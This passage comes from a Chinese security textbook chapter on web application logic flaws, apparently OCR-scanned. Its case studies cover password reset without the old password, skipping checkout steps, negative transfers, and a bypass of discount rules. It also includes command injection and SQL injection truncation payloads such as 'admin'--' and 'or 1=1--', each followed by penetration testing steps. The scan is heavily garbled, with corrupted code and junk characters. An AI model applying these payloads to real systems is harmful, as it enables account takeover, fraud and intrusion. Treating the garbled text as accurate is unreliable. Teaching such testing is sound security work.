应 用 程序 为 终端 用 户 提 供 密码 修改 功能 。 它 要 求 用 户 填 写 用 户 
名 、 现 有 密码 、 新 密码 与 确认 新 密码 字段 。 

应 用 程序 还 为 管理 员 提 供 密码 修改 功能 。 这 项 功能 允许 他 们 修改 
任何 用 户 的 密码 ， 而 不 必 提 交 现 有 密码 。 这 两 项 功能 在 同一 个 服务 器 
端 脚本 中 执行 。 

2. 假设 

应 用 程序 为 用 户 和 管理 员 提供 的 客户 端 界面 仅 有 一 点 不 同 : 在 管 
理 员 界 面 中 没有 用 于 填写 现 有 密码 的 字段 。 当 服务 器 端 应 用 程序 处 理 
密码 修改 请 求 时 ， 它 通过 其 中 是 否 包 含 现 有 密码 参数 确定 请 求 是 来 目 
aoa ° 换 句 话说 ， 它 认为 普通 用 户 总 会 提交 现 

密码 参数 。 


负责 执行 这 项 功能 的 代码 如 下 : 


String existingPassword = request.getParameter("existingPassword") ; 
if {mull == existingPassword) 
trace("Old password not supplied, must be an administrator"); 
return true; 
trace("Verifying user's old password"); 


3. 攻击 方法 

一 旦 确定 开发 者 做 出 的 假设 后 ， 逻 辑 缺陷 就 变 得 非常 明显 。 当 
然 ， 普 通用 户 也 可 以 提交 并 不 包含 现 有 密码 参数 的 请 求 ， 因 为 用 户 控 
制 着 他 们 提出 的 请 求 的 每 一 个 方面 。 

这 种 逻辑 缺陷 可 能 给 应 用 程序 造成 巨大 破坏 。 攻 击 者 可 利用 这 种 
缺陷 重新 设置 任何 用 户 的 密码 ， 完 全 控制 他 们 的 账户 。 


渗透 测试 步骤 


(1) 在 关键 功能 中 探查 逻辑 缺陷 时 ， 演 试 轮流 删除 在 请 求 中 
sae a gene rs Sages Se ee ay 
(2) 既 要 删除 参数 名 称 ， 也 要 删除 参数 值 。 不 要 只 提交 一 


空 字符 串 ， 因 为 服务 器 会 对 这 种 字 答 串 另 做 处 理 。 

(3) 一 次 仅 攻击 一 个 参数 ， 确 保 到 达 应 用 程序 中 所 有 与 参数 
有 关 的 代码 路 径 。 

(4) 如 果 控制 的 请 求 属于 多 阶段 过 程 ， 一 定 要 完成 整个 过 
程 ， 因 为 后 面 的 一 些 逻 辑 可 能 会 处 理 在 前 面 的 步骤 中 提交 并 在 会 话 
中 保存 的 数据 。 


11.2.3 (3: 直接 结 


我 们 曾 在 一 家 网 上 零售 商 使 用 的 Web 应 用 程序 中 发 现 过 这 种 逻辑 
缺陷 


功能 
订单 的 过 程 包括 以 下 步骤 。 
1) 浏览 产品 目录 并 往 购 物 车 中 添加 商品 。 
2) 瓜 回 购物 车 并 最 终 确认 订单 。 
3) 输入 支付 信息 。 
4) 输入 交 货 信息 。 

2. 假设 

开发 者 认为 用 户 总 会 按 预 定 的 顺序 执行 每 一 个 步骤 ， 因 为 这 是 应 
用 程序 通过 显示 在 浏览 器 中 的 导航 链接 和 表单 向 用 户 提供 的 处 理 顺 
序 。 因 此 ， 开 发 者 认为 任何 完成 订购 过 程 的 用 户 一 定 已 经 提交 了 令 人 
满意 的 支付 信息 。 

3. 攻击 方法 

很 明显 ， 开 发 者 的 假设 存在 缺陷 。 用 户 控制 着 他 们 回应 用 程序 提 
出 的 每 一 个 请 求 ， 因此 能 够 按 任何 | 问 订 购 过 程 的 每 一 个 阶段 。 
如 果 直 接 从 第 〈2) BHA (4) 步 ， 攻 击 者 就 可 生成 一 个 最 终 确 定 
交 贷 、 但 实际 上 并 未 支付 的 订单 。 


1. 
下 
( 


渗透 测试 步骤 


发 现 并 利用 这 种 缺陷 的 技巧 叫 作 强制 浏览 ， 包 括 避 开 浏 贤 磊 导 
航 对 应 用 程序 功能 访问 顺序 实施 的 任何 控制 。 

(1) 如 果 一 个 多 阶段 过 程 需要 按 预定 的 顺序 提交 一 系列 请 
求 ， 笑 试 按 其 他 顺序 提交 这 些 请 求 。 壬 试 完全 省 略 某 些 阶 段 、 儿 次 
访问 同一 个 阶段 或 者 推 后 访问 前 一 个 阶段 。 

(2) 这 些 阶段 的 结果 可 通过 一 系列 指向 特殊 URL 的 GET 或 
POST 请 求 进行 访问 ， 或 者 需要 疝 同一 个 URL 拓 交 不 同 的 参数 。 被 
访问 的 阶段 可 通过 在 被 请 求 的 参数 中 提交 功能 名 称 或 索引 来 指定 。 
确保 完全 了 解 应 用 程序 访问 特殊 阶段 所 使 用 的 机 制 。 

(3) 根据 执行 功能 的 情形 ， 试 图 了 解 开发 者 做 出 的 假设 及 主 
要 受 攻击 面 位 于 何 处 。 设 法 找到 违反 这 些 假设 从 而 在 应 用 程序 中 造 
成 反 音 行为 的 方法 。 

(4) 如 采 不 按 顺 序 访 问 多 阶段 功能 ， 应 用 程序 常常 表现 出 一 
系列 异 第 现象 ， 如 变量 值 为 空 字符 或 未 被 初始 化 、 状 态 仅 部 分 定义 
或 相互 矛盾 以 及 其 他 无 法 预料 的 行为 。 这 时 ， 应 用 程序 可 能 会 返回 
AAIR ESRAR, ATRD TRARAL AX S Bi 
或 其 他 攻击 进行 优化 “请 参阅 第 15 章 了 解 相关 内 容 ) 。 有 时 ， 应 用 
i 

陷 。 


T 注解 许多 类 型 的 访问 控制 漏洞 与 这 种 逻辑 缺陷 类 似 。 如 


条 一 项 特权 功能 需要 完成 几 个 按 预 定 顺序 访问 的 阶段 才能 实现 处 

理 ， 应 用 程序 可 能 认为 用 户 总 会 按 这 个 顺序 处 理 该 项 功能 。 应 用 程 
序 可 能 会 对 这 个 过 程 的 初始 阶段 实施 严格 的 访问 控制 ， 并 认为 任何 
到 达 后 面 阶段 的 用 户 一 定 已 经 获得 相关 授权 。 如 果 一 个 低 权限 的 用 
尸 直接 进入 了 后 面 的 一 个 阶段 ， 他 整 能 够 无 限制 地 访问 这 个 功能 。 
请 参阅 第 8 章 了 解 查 找 并 利用 这 种 漏洞 的 详情 。 


11.2.4 fila: 修改 保险 单 


我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 中 过 到 过 这 种 逻 
辑 缺 陷 。 

1. 功能 

应 用 程序 为 用 户 提供 保险 报价 ， 如 果 需 要 ， 用 户 可 在 线 完成 并 提 
交 一 份 保险 申请 。 这 个 过 程 包括 如 下 几 个 阶段 。 

口 第 一 阶段 ， 申 请 人 提交 一 些 基 本 信息 ， 并 指定 首选 月 保费 或 希 
a a 

口 后 几 个 阶段 ， 申 请 人 提交 其 他 各 种 个 人 信息 ， 包 括 健康 状况 、 
职业 与 爱好 。 

口 最 后 ， 应 用 程序 连接 一 名 为 保险 公司 工作 的 保险 员 。 保 险 员 使 
用 该 web 应 用 程序 审核 申请 人 提交 的 信息 ， 并 决定 是 否 接受 申请 ， 或 
者 修改 最 初 的 报价 以 反映 任何 额外 的 风险 。 

在 上 述 的 每 一 个 阶段 中 ， 应 用 程序 使 用 一 个 共享 组 件 处 理 用 户 提 
交 的 每 一 个 参数 。 这 个 组 件 将 每 个 POST 请 求 中 的 所 有 数据 解析 成 名 / 
en 

2. 假 

处 理 用 户 提 交 的 数据 的 组 件 认 为 每 个 请 求 仅 包含 用 户 在 相关 
HTML 表 单 中 提交 的 参数 。 而 开发 者 并 未 考虑 到 这 种 情形 : 如果 一 名 
用 户 提交 了 应 用 程序 并 不 希望 他 提交 的 参数 ， 将 会 出 现 什么 情况 。 

3. 攻击 方法 

上 述 假设 当然 存在 缺陷 ， 因 为 用 户 可 在 每 个 请 求 中 提交 任意 参数 
与 参数 值 。 因 此 ， 应 用 程序 的 核心 功能 有 许多 不 完善 的 地 方 。 

口 攻击 者 可 以 利用 共享 组 件 避 开 所 有 服务 器 端的 输入 确认 。 在 报 
价 过 程 的 每 一 个 阶段 ， 应 用 程序 对 这 些 阶 段 提 交 的 数据 执行 严格 的 确 
认 ， 并 拒绝 任何 未 通过 这 种 确认 的 数据 。 但 是 ， 共 享 组 件 使 用 用 户 提 
交 的 每 一 个 参数 更 新 应 用 程序 的 状态 。 因 此 ， 如 果 攻 击 者 提供 应 用 程 
序 在 较 早 阶段 需要 的 一 个 名 / 值 对 ， 不 按 顺序 提交 数据 ， 那 么 应 用 程序 
将 不 对 其 进行 任何 确认 ， 直 接 接受 并 处 理 该 数据 。 如 果 出 现 这 种 情 
况 ， 恶 意 用 户 就 可 以 据 此 实施 针对 保险 员 的 保存 型 跨 站 点 脚本 攻击 ， 
访问 属于 其 他 应 用 程序 的 个 人 信息 (请 参阅 第 12 章 了 解 相关 内 容 ) 。 


口 攻击 者 能 够 以 任意 价格 购买 保险 。 在 报价 过 程 的 第 一 阶段 ， 申 
请 人 指定 他 们 首选 的 月 保费 或 希望 投保 的 金额 ， 应 用 程序 据 此 计算 其 
他 值 。 然 而 ， 如 采用 户 在 后 续 茶 个 阶段 为 上 面 的 一 个 或 几 个 数据 项 扣 
交 新 的 值 ， 那 么 应 用 程序 将 根据 这 些 值 更 新 目 己 的 状态 。 不 按 顺序 提 
交 这 些 参 数 ， 攻 击 者 束 可 以 获得 任意 价格 的 保险 报价 及 任意 月 保费。 

口 应 用 程序 并 不 对 某 一 类 用 户 能 够 提交 哪些 参数 实施 访问 控制 。 
当 保 险 员 审核 完成 的 申请 时 ， 他 们 会 更 新 各 种 数据 ， 包 括 做 出 承保 决 
定 。 这 些 数据 由 处 理 普 通用 户 提 交 的 数据 的 同一 个 共 至 组 件 处 理 。 如 
果 攻 击 者 知道 或 猜测 出 保险 员 在 审查 申请 时 使 用 的 参数 名 称 ， 束 可 以 
提交 这 些 参数 ， 不 用 签署 保单 即 可 接受 目 己 的 申请 。 


渗透 测试 步骤 


这 些 缺 陷 可 严重 危及 应 用 程序 的 安全 ， 但 是 ， 如 果 攻 击 者 仅 拦 
二 浏览 嘎 请 求 并 修改 补 提 交 的 参数 值 ， 还 是 无 法 确定 其 中 任何 一 个 
陷 。 

(1) 只 要 应 用 程序 通过 几 个 阶段 执行 一 项 关键 操作 ， 就 应 该 
提取 在 某 个 阶段 提交 的 参数 ， 然 后 尝试 在 另 一 个 阶段 提交 这 些 参 
数 。 如 果 相 关 数 据 随 应 用 程序 的 状态 一 起 更 新 ， 应 该 探索 这 种 行为 
的 衍生 效果 ， 确 定 是 否 可 以 利用 它 实施 任何 恶意 操作 ， 如 前 面 的 3 
个 示例 所 壕 。 

(2) 如 果 应 用 程序 执行 一 项 功能 ， 不 同类 型 的 用 户 可 根据 一 
组 共同 的 数据 更 新 或 执行 其 他 操作 ， 应 该 利用 每 种 类 型 的 用 户 执行 
该 功能 并 观察 他 们 提交 的 参数 。 如 果 不 同 的 用 户 提交 不 同 的 参数 ， 
就 提取 由 一 名 用 户 提交 的 每 个 参数 ， 并 尝试 以 其 他 用 户 的 身份 提交 
这 些 参数 。 如 果 应 用 程序 接受 并 处 理 这 些 参数 ， 如 前 面 所 述 ， 探 索 
这 种 行为 的 衍生 效果 。 


11.2.5” 例 5: 入 侵 银行 


我 们 曾 在 一 家 大 型 金融 服务 公司 使 用 的 Web 应 用 程序 中 过 到 过 这 
种 逻辑 缺陷 。 

1. 功能 

应 用 程序 允许 尚未 使 用 在 线 应 用 程序 的 顾客 进行 注册 。 然 后 ， 应 
用 程序 要 求 新 用 户 提 供 一 些 基 本 的 个 人 信息 ， 在 一 定 程度 上 确认 他 们 
的 身份 。 这 些 信息 包含 姓名 、 地 址 和 出 生日 期 ， 但 并 不 包括 任何 机 密 
言 息 ， 如 现 有 密码 或 PIN 号码。 

顾客 正确 输入 这 些 信息 后 ， 应 用 程序 再 将 注册 请 求 转交 给 后 端 系 
统 处 理 。 然 后 ， 再 同 用 户 注册 的 家 庭 地 址 邮寄 一 个 信息 包 于 。 包 庄内 
含有 如 何 通 过 给 公司 呼叫 中 心 拨打 电话 激活 在 线 访问 的 指导 ， 以 及 用 
a eee 

2. (Ri 


应 用 程序 的 设计 者 认为 这 种 机 制 可 为 防止 未 授权 访问 提供 强大 的 
保护 。 该 机 制 实施 以 下 3 层 保护 。 

口 应 用 程序 要求 用 户 提前 输入 一 部 分 个 人 信息 ， 阻 止 恶 意 攻 击 者 
或 恶作剧 用 户 以 其 他 用 户 的 号 份 进行 注册 。 

口 注册 过 程 包括 以 非常 规 邮 寄 的 形式 同 顾客 注册 的 家 庭 地址 传送 
ed eee 
BF ° 

口 注册 功能 要 求 顾客 给 呼叫 中 心 挨打 电话 ， 并 根据 个 人 信息 与 在 
PIN 写 码 中 移 择 的 数 子 ， 以 第 规 方 式 核实 他 们 的 身份 。 

这 种 设计 确实 非常 安全 。 但 是 ， 该 机 制 的 实际 执行 过 程 存在 逻辑 
Wes 


< 

执行 注册 机 制 的 开发 者 需要 以 茶 种 方式 保存 用 户 提 交 的 个 人 信 
轧 ， 并 将 它们 与 公司 数据 库 中 储存 的 客户 号 份 天 联 起 来 。 由 于 希望 重 
复 利 用 现 有 代码 ， 他 们 使 用 以 下 这 个 似乎 能 够 满足 要 求 的 类 : 


class CCustomer 


{ 
String firstName; 
String lastName; 
CDoB dob; 


CAddress homeAddress; 
long custNumber; 


获得 用 户 信息 后 ， 这 个 对 象 被 实例 化 ， 与 提交 的 信息 一 起 保存 在 
用 户 会 话 中 。 然 后 ， 应 用 程序 核对 用 户 信息 ， 如 果 信 息 有 效 ， 驳 给 该 
用 户 分 配 一 个 唯一 的 顾客 号 码 ， 并 将 其 用 在 公司 的 所 有 系统 中 。 随 
后 ， 应 用 程序 将 这 个 号 码 连 同 用 户 的 其 他 一 些 有 用 信息 ， 一 起 添加 到 
这 个 对 象 中 。 最 后 ， 这 个 对 象 被 传送 至 处 理 注册 请 求 的 后 端 系统 进行 
处 理 。 

开发 者 认为 使 用 这 个 代码 组 件 并 无 妨碍 ， 不 会 造成 任何 安全 问 
题 。 然 而， 这 种 错误 的 假设 可 能 会 造成 三重 的 后 采 。 


3. 攻击 方法 

应 用 程序 的 其 他 功能 (包括 核心 功能 ) 也 使 用 合并 到 注册 功能 
的 相同 代码 组 件 ， 核 心 功 能 允许 通过 验证 的 用 户 访问 账户 、 账 目 、 转 
账 和 其 他 信息 。 一 名 注册 用 户 成 功 通过 应 用 程序 的 验证 后 ， 这 个 对 象 
也 被 实例 化 ， 并 保存 在 他 的 会 话 中 ， 用 于 存储 与 其 身份 有 关 的 关键 信 
息 。 应 用 程序 的 绝 大 多 数 功 能 在 执行 操作 时 引用 这 个 对 象 中 保存 的 信 
息 。 例 如 ， 应 用 程序 根据 保存 在 这 个 对 象 中 的 唯一 顾客 号 码 生 成 在 用 
户主 页 面 显示 的 账户 信息 。 

应 用 程序 的 其 他 功能 已 经 使 用 这 个 代码 组 件 ， 意 味 着 开发 者 的 假 
设 存 在 缺陷 ， 应 用 程序 重复 使 用 它们 的 方式 确实 会 造成 一 个 巨大 的 漏 
ji] 。 

虽然 这 个 漏洞 非常 严重 ， 但 实际 上 我 们 很 难 发 现 并 利用 这 个 漏 
洞 。 应 用 程序 的 主要 功能 受到 几 层 访问 控制 的 保护 ， 用 户 需 要 拥有 一 
个 完全 合法 的 会 话 才能 通过 这 些 控制 。 因 此 ， 为 利用 这 个 逻辑 缺陷 ， 
攻击 者 需要 执行 以 下 步骤 。 

口 使 用 他 上 自己 的 有 效 账户 证 书 登 录 应 用 程序 。 

口 使 用 登录 后 得 到 的 通过 验证 的 会 话 ， 访 问 注 册 功 能 并 提交 男 一 
名 顾客 的 个 人 信息 。 这 样 ， 应 用 程序 就 会 用 一 个 与 目标 顾客 有 关 的 对 
象 ， 重 写 攻击 者 会 话 中 最 初 的 CCustomer 对 象 。 

口 返 回应 用 程序 主要 功能 并 访问 其 他 顾客 的 账户 。 

从 “墨盒 "角度 探查 应 用 程序 时 ， 这 种 漏洞 并 不 明显 。 同 时 ， 当 审 
查 或 编写 源 代 码 时 ， 我 们 也 很 难 发 现 它 。 如 果 未 能 明确 、 全 面 地 了 解 
应 用 程序 及 其 在 不 同 区 域 使 用 的 各 种 组 件 ， 我 们 可 能 无 法 知道 开发 者 
做 出 的 错误 假设 。 当 然 ， 添 加 明确 注释 的 源 代 码 与 设计 文档 也 有 助 于 
降低 引入 或 探测 不 到 这 种 缺陷 的 可 能 性 。 


渗透 测试 步骤 


(1) 在 一 个 需要 隔离 水 平权 限 或 牌 直 权限 的 复杂 应 用 程序 


中 ， 设 法 确定 个 体 用 户 能 够 在 会 话 中 “聚积 "大 量 与 其 身份 有 天 的 状 
态 信息 的 所 有 情况 。 

(2) 党 试 浏览 一 个 功能 区 域 ， 然 后 转换 到 另 一 个 完全 无 关 的 
-0 
|p] ° 


11.2.6 例 6: 规避 交 j| 


我 们 在 一 家 制造 公司 使 用 的 基于 Web 企 业 资 源 规划 的 应 用 程序 中 
发 现 过 这 种 逻辑 缺陷 。 

1. 功能 

财务 人 员 有 资格 在 公司 拥有 的 银行 账户 与 公司 关键 客户 和 供应 商 
的 账户 之 间 进 行 转 账 。 为 防止 金融 欺诈 ， 应 用 程序 将 大 多 数 用 户 的 转 
账 金额 限制 在 10 000 美 元 之 内 。 如 果 转 账 金额 超出 这 个 限制 ， 就 需要 
得 到 高 级 经 理 的 批准 。 

2. 假设 

应 用 程序 中 负责 金额 检查 的 代码 极其 简单 : 


bool CAuthCheck: :RequiresApproval{int amount) 
{ 
if (amount <= m_apprThreshold) 
return false; 
else return true; 
} 


开发 者 认为 这 种 透明 的 检查 非常 安全 。 如 有 果 转 账 金额 超出 预先 设 


定 的 限制 ， 只 有 得 到 高 级 经 理 的 许可 交易 才能 进行 。 
3. 攻击 方法 


开发 者 的 假设 存在 缺陷 ， 因 为 他 完全 忽略 了 用 户 用 负 人 金额 进行 转 
账 的 可 能 性 。 由 于 任何 负 值 都 小 于 转账 金额 限制 ， 因 此 不 需要 得 到 进 
一 步 的 批准 。 但 是 ， 应 用 程序 的 银行 模块 接受 负 值 转账 ， 并 以 反 向 正 
值 转账 的 形式 对 其 进行 处 理 。 因 此 ， 如 果 用 户 希 望 从 A 账 户 转账 20 000 
美元 到 B 账 户 ， 他 只 需 从 B 账 户 转账 -20 000 美 元 到 A 账 户 ， 即 可 得 到 相 
同 的 效果 ， 并 且 不 需要 经 过 批准 。 应 用 程序 实施 的 反 欺 诈 防 御 措施 也 
被 轻易 避 开 | 


sg 注解 ”许多 Web 应 用 程序 在 它们 的 交易 逻辑 中 采用 数字 限 


额 ， 例 如 ; 
口 零 售 应 用 程序 禁止 用 户 订购 超出 其 库存 量 的 商品 ， 
口 银行 应 用 程序 禁止 用 户 支付 超出 其 当前 账户 余额 的 账单 ， 
口 保险 应 用 程序 根据 年 龄 限制 调整 报价 。 


找到 规避 这 个 限额 的 方法 通常 并 不 表示 应 用 程序 存在 安全 疡 
洞 。 但 是 ， 这 样 做 会 造成 广 重 的 商业 后 果 ， 并 表示 所 有 者 依赖 应 用 
程序 实施 的 控制 存在 缺陷 。 

在 发 布 应 用 程序 前 执行 的 用 户 验收 测试 过 程 中 ， 我 们 通常 可 以 
仿 测 出 最 明显 的 漏洞 。 然 而 ， 隐 藏 较 深 的 漏洞 依然 存在 ， 特 别 是 操 
纵 隐 藏 参数 造成 的 漏洞 。 


渗透 测试 步骤 


尝试 规避 交易 限制 的 第 一 步 是 了 解 受 控制 的 相关 输入 接受 哪些 
字符 。 


(1) 尝试 输入 负 值 ， 看 应 用 程序 是 否 接 受 这 些 值 并 按 预 想 的 
方式 对 它们 进行 处 理 。 

(2) 可 能 需要 执行 几 步 操作 ， 改 变 应 用 程序 的 状态 ， 使 其 对 
攻击 有 用 。 例 如 ， 可 能 需要 在 账户 之 间 进 行 几 次 转账 ， 直 到 得 到 可 
提取 的 适当 余额 。 


11.2.7_ 例 7: 获得 大 幅 折扣 


a ree Eee eee 
1. 功能 

应 用 程序 允许 用 户 订购 软件 产品 ， 如 果 购 买 的 商品 达到 一 定数 
量 ， 就 有 资格 获得 大 幅 折 扣 。 例 如 ， 如 果 用 户 分 别 购 买 了 一 款 防 病毒 
解决 方案 、 个 人 防火 墙 与 防 垃 圾 邮件 软件 ， 他 就 可 以 获得 25% 的 折 
扣 。 


2. 假设 

当 用 户 在 购物 车 中 增加 一 件 商 品 时 ， 应 用 程序 就 使 用 各 种 规则 决 
定 他 选择 购买 的 产品 是 否 让 他 有 资格 获得 任何 折扣 。 如 果 用 户 可 以 获 
得 折扣 ， 应 用 程序 就 根据 折扣 率 调整 购物 车 中 的 商品 价格 。 开 发 者 认 
为 用 户 只 有 购买 捆绑 销售 的 商品 ， 才 能 获得 折扣 。 

3. 攻击 方法 

开发 者 的 假设 存在 相当 明显 的 缺陷 ， 因 为 该 假设 忽略 了 一 个 事 
实 ， 即 用 户 向 购物 车 中 添加 商品 后 可 能 会 再 将 其 从 中 移 走 。 狐 独 的 用 
户 可 能 会 往 购 物 车 中 添加 供应 商 出 售 的 大 量 产 品 ， 以 获得 最 大 可 能 的 
折扣 。 当 购物 车 中 的 商品 可 以 采用 折扣 时 ， 他 就 会 把 不 需要 的 商品 从 
中 取 走 ， 而 购物 车 中 剩 下 的 商品 仍然 可 以 享受 原来 的 折扣 。 


渗透 测试 步骤 


(1) 如 果 有 任何 价格 或 其 他 敏感 价值 需要 根据 用 户 控制 的 数 
据 或 操作 确定 的 标准 进行 调整 ， 首 移 应 了 解 应 用 程序 使 用 的 算法 以 


及 需要 调整 的 逻辑 。 确 定 这 些 调整 是 一 次 性 行为 ， 还 是 需要 根据 用 
户 执行 的 其 他 操作 进行 修改 。 

(2) 发 挥 想 象 ， 努 力 想 出 操纵 应 用 程序 行为 的 办 法 ， 使 应 用 
程序 进行 的 调整 与 开发 者 最 初 设 定 的 标准 相互 矛盾 。 如 前 所 述 ， 在 
应 用 折扣 后 再 从 购物 车 中 取出 商品 束 古 最 典型 的 示例 。 


11.2.8 fils: 避免 转 义 


我 们 曾 在 各 种 Web 应 用 程序 中 遇 到 过 这 种 逻辑 缺陷 ， 包 括 一 款 网 
sci a 

1. 功能 

应 用 程序 的 设计 者 决定 执行 某 种 功能 ， 该 功能 需要 以 自 变 量 的 形 
式 向 操作 系统 命令 提交 用 户 控制 的 输入 。 应 用 程序 的 开发 者 知道 这 种 
操作 包含 着 内 在 的 风险 (请 参见 第 9 章 了 解 相关 内 容 ) ， 并 决定 净化 用 
户 输入 中 出 现 的 任何 潜在 的 恶意 字符 ， 从 而 防御 这 种 风险 。 下 面 的 字 
符 都 需要 使 用 反 斜 线 (\) 进行 转 义 : 


; | & < > 空格 和 换行 符 


以 这 种 方式 进行 转 义 后 ，shell 命 令 解 释 器 就 把 它们 当做 提交 给 被 
调用 命令 的 自 变 量 的 一 部 分 ， 而 非 shell 元 字符 。 后 者 可 用 于 注入 其 他 
命令 或 自 变量 、 重 定向 输出 等 。 

2. 假设 

开发 者 确信 ， 他 们 设计 的 方法 可 有 效 防 御 命 令 注 入 攻击 。 他 们 考 
虑 到 了 每 一 个 可 能 被 攻击 者 利用 的 字符 ， 并 确保 对 它们 进行 了 适当 的 
转 义 处 理 ， 因 而 它们 不 会 造成 风险 。 

3. 攻击 方法 

开发 者 忘记 了 对 转 义 字符 本 身 进 行 转 义 。 


通常 ， 攻 击 者 在 利用 简单 的 命令 注入 漏洞 时 并 不 直接 使 用 反 矢 
线 ， 因 此 开发 者 认为 它 并 非 恶 意 字 符 。 然 而 ， 正 是 由 于 没有 对 它 进行 
转 义 ， 攻 击 者 束 可 以 完全 破坏 应 用 程序 的 净化 机 制 。 

假设 攻击 者 向 易 受 攻击 的 功能 提交 以 下 输入 : 


foo\;l1s 
RUB Irae, x FA SS ETT a SS SS REC CE er 


入 变 成 
Tooke ls 


当 这 个 数据 作为 目 变 量 提交 给 操作 系统 命令 时 ，shell 解释 器 把 第 
一 个 反 斜 线 作 为 转 义 了 字符， 而 把 第 二 个 反 和 斜 线 当做 字面 量 反 斜 线 处 
H, 反 斜 线 不 是 一 个 转 义 字符 ， 而 是 目 变 量 的 一 部 分 。 然 后 它 遇 到 分 
号 字符 ， 该 字符 明显 没有 进行 转 义 。 解 释 右 把 分 号 作为 一 个 命令 分 隔 
符 ， 因 此 继续 执行 攻击 着 注入 的 命令 。 


渗透 测试 步骤 


当 在 应 用 程序 中 探查 命令 注入 及 其 他 缺陷 时 ， 壬 试 在 受 控 制 的 
数据 中 插入 相关 元 子 符 后 ， 接 着 在 每 个 元 字符 前 插入 一 个 反 斜 线 ， 
测试 前 面 描述 的 逻辑 缺陷 。 


TZ 注解 一 些 防御 路 站 点 脚本 攻击 (请 参阅 第 12 章 了 解 相关 


内 容 ) 的 措施 中 也 存在 这 种 的 逻辑 缺陷 。 将 用 户 提交 的 输入 直接 复 
制 到 一 段 JavaScript 脚 本 的 字符 串 变 量 值 中 时 ， 这 个 值 包含 在 引号 
内 。 为 防御 跨 站 点 脚本 攻击 ， 许 多 应 用 程序 使 用 反 斜 线 对 出 现在 用 
户 输 入 中 的 引号 进行 转 义 。 然 而 ， 如 果 反 和 斜 线 本 吴 并 没有 转 义 ， 那 
么 攻击 者 束 可 以 提交 \* 破 坏 字 符 串 ， 从 而 控制 脚本 。 早 先 版 本 的 
Ruby On Rails 框 染 的 escape_javascript 芳 数 中 就 存在 这 种 漏洞。 


11.2.9 (9: 避 开 输入 确认 


笔者 曾 在 一 个 电子 商务 站 点 的 Web 应 用 程序 中 发 现 这 种 逻辑 缺 
人 

1. 功能 

该 应 用 程序 包含 一 组 输入 确认 程序 ， 以 防范 各 种 类 型 的 攻击 。 其 
中 的 两 种 防御 机 制 为 SQL 注 入 过 滤 和 长 度 限制 。 

通常 ， 应 用 程序 对 在 基于 字符 串 的 用 户 输入 中 出 现 的 任何 单 引号 
进行 转 义 (并 拒绝 在 数字 输入 中 出 现 的 任何 单 引 号 ) ， 以 防范 SQL 注 
入 。 如 第 9 章 所 述 ， 两 个 单 引号 在 一 起 将 构成 一 个 转 义 序列 ， 表 示 一 个 
原 义 单 引 号 ， 数 据 库 会 将 其 解释 为 引用 字符 串 中 的 数据 ， 而 不 是 结束 
字符 串 的 终止 符 。 因 此 ， 许 多 开发 者 认为 ， 通 过 将 用 户 提 区 的 输入 中 
的 任何 单 引 号 配对 ， 束 可 以 防止 SQL 注入 攻击 。 

长 度 限制 适用 于 所 有 输入 ， 人 确保 用 户 提交 的 变量 不 会 超过 128 个 字 
ee ane 

2. 假 


从 安全 的 角度 来 说 ，SQL 注 入 过 滤 和 长 度 限制 都 属于 适当 的 防御 
机 制 ， 因 此 两 种 防御 机 制 都 应 该 采用 。 

3. 攻击 方法 

SQL 广 入 防御 通过 将 用 户 输入 中 的 任何 引号 配对 而 生效 ， 因 此 ， 
在 每 对 引号 中 ， 第 一 个 引号 将 作为 第 二 个 引号 的 转 义 字符 。 但 是 ， 开 
发 者 并 没有 考虑 到 ， 如 果 将 经 过 转 义 的 输入 提交 给 “ 截 短 ”功能 ， 将 会 
发 生 什么 情况 。 

回 到 第 9 革 中 的 登录 功能 SQL 注 入 示例 。 假 设 应 用 程序 将 用 户 输 入 
中 的 任何 单 引 号 配对 ， 然 后 对 该 数据 实施 长 度 限制 ， 将 其 截 短 为 128 个 
FFF e MARGEAC PAP 4: 


admin'-- 
将 导致 以 下 无 法 避 开 登录 的 查询 : 
SELECT * FROM users WHERE username ‘acmin''--' and password = '' 


但 是 ， 如 果 提 交 以 下 用 户 名 〈 包 含 127 个 a 后 接 一 个 单 引 号 ) : 
aaaaaaaa(...]aaaaaaaaaaa' 


WHE eS BCH S| SAO, PRES RRA 128-4 FF, 
SBCA KE SURGE INSECURE, AA Te ee PE 
入 了 另外 一 个 单 引 号 ， 而 没有 纠正 周围 的 语法 。 此 时 如 果 提 交 密 码 : 


or L=i-- 

应 用 程序 将 执行 以 下 查询 ， 从 而 成 功 避 开 登录 : 
SELECT * FROM users WHERE username = ‘aaaaaaaa([...]aaaaaaaaaaa’''’ and 
password = ‘or l=1l--' 


由 a 组 成 的 字符 串 末 尾 的 已 配对 引号 将 被 解释 为 转 义 引号 ， 因 而 被 
作为 查询 数据 的 一 部 分 。 这 个 字符 串 将 继续 有 效 ， 直 到 下 一 个 单 引号 
位 置 结束 ， 而 在 原始 的 查询 中 ， 这 个 位 置 为 用 户 提交 的 密码 值 的 开始 
部 分 。 这 样 ， 数 据 库 理解 的 用 户 名 为 如 下 所 示 的 字符 串 数据 : 


aaaaaaaa[...]aaaaaaaaaaa'and password = 


因此 ， 之 后 的 任何 内 容 均 被 解释 为 查询 的 一 部 分 ， 因 而 可 以 进行 
专门 设计 以 破坏 查询 人 逻辑 。 


YY fem 不 必 清 楚 了 解 应 用 程序 实施 的 长 度 限制 ， 只 需 轮流 
fest RAPS MAF, HE eRe EAR, BU a) Mee 
类 型 的 漏洞 : 


a and so on 


截 短 转 义 输入 将 在 偶数 或 奇数 个 字符 之 后 发 生 。 无 论 是 哪 一 种 情 
况 ， 以 上 其 中 一 个 字符 串 将 导致 在 查询 中 插入 奇数 数量 的 单 引号 ， 
从 而 生成 无 效 的 语法 。 


渗透 测试 步骤 


记 下 应 用 程序 修改 用 户 输入 (特别 是 截 短 、 删 除数 据 、 编 码 或 
解码 ) 的 任何 位 置 。 对 于 观察 到 的 每 一 个 位 置 ， 确 定 是 否 可 以 人 为 
构造 恶意 字符 串 。 

(1) 如 果 数 据 已 被 过 滤 一 次 〈 非 递归 ) ， 确 定 是 否 可 以 提交 
一 个 “补偿 ?过滤 操作 的 字符 串 。 例 如 ， 如 果 应 用 程序 过 滤 SELECT 
这 个 SQL 关键 字 ， 则 可 以 提交 SELSELECTECT， 看 过 滤 机 制 是 否 会 
删除 其 中 的 SELECT 子 字符 串 ， 而 留 下 SELECT ° 

(2) 如 果 数 据 确认 按 设 定 的 顺序 发 生 ， 并 且 有 一 个 或 多 个 确 
认 步 又 修改 了 数据 ， 则 确定 是 否 可 以 将 这 些 步 又 用 于 破坏 之 前 的 确 
